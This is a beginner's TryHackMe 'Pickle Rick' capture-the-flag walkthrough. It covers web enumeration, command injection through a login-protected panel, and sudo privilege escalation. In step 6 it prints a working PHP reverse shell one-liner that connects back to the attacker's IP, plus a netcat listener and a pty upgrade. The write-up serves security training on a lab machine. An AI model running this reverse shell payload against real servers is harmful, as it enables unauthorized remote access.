Pickle Rick — THM Writeup

Abdul Wassay (HotPlugin)
4 min readOct 14, 2021
Pickle Rick Room — THM

Introduction:

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients (flags) that will help Rick make his potion to transform himself back into a human from a pickle.

Methodology:

As it’s explained in room introduction that it is web based room and we have to exploit web server to find three flags (aka ingredients a/c to theme). So, We don’t need to do network enumeration and our only focus will be website.

  1. So go ahead spin up the machine and navigate to the website on given ip address.

2. Whenever i do web enumeration, my first go to is always inspecting the source code (ctrl+u) of page and navigate around the whole website. So, Viewing the source, we have found a note mistakenly left by developer which contains sensitive information (username). We don’t know the use of this username so we will put this username in our back pocket (notes) and continue our enumeration.

3. Continuing our enumeration, we have only single webpage. So, we need to enumerate the hidden directories/webpages that might be of our interest. There are many tools out there for this task like gobuster, dirb, dirbuster etc. You can use whatever you are comfortable with. But i’m gonna use dirbuster because i find it easy and simple to use.

After a few minutes of scanning, we have found some directories. Out of which login.php, portal.php and robots.txt are very interesting for us.

4. Now we navigate to these pages one by one. First, upon navigating to robots.txt, we have found some text. Since, we don’t know what it is, we will just keep it our back pocket (notes) and move on.

Next, moving to the login page we found a portal.

Now, we don’t know the credentials. But checking our notes, we already found a username on home page and a weird text from robots.txt. So, using those findings as credentials we successfully logged in.

5. We can see, there’s a command panel which let’s us inject commands. But, some command are restricted like we cannot read files.

6. Now, what we can do is that since we know there’s PHP running on the server so we can inject a php reverse shell to gain access. Here’s the one that i got from PayloadsAllTheThings repo.

php -r ‘$sock=fsockopen(“<Your VPN IP>”,4444);$proc=proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);’

But before executing this script we need to setup a listener on our machine using netcat.

nc -nvlp 4444

NetCat Listener

Now, after executing the above php script we successfully got shell.

But that’s not a pretty shell, we cannot autocomplete commands like a basic shell. Since, we know from above command that there’s python3 installed so we can easily spawn a tty shell by using the following python3 one-liner.

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

7. Now, we can read the first flag and clue file. The second flag is in the /home/rick directory.

8. Now, for the last flag, we need to be root hence escalate privileges. So first we need to check what commands we can run as super user. We can check this using sudo -l command.

We can the result of command. It says we can run all commands as super user without any password. HUH!!!

9. So, we switch the user to root and find the last flag located in /root directory.

Conclusion:

That was FUN!!! It was a pretty basic room for beginners practice. First we enumerated the web and found information disclosure and Remote Code Execution leading us to reverse shell. Then, due to security misconfigurations, we easily got root.

--

--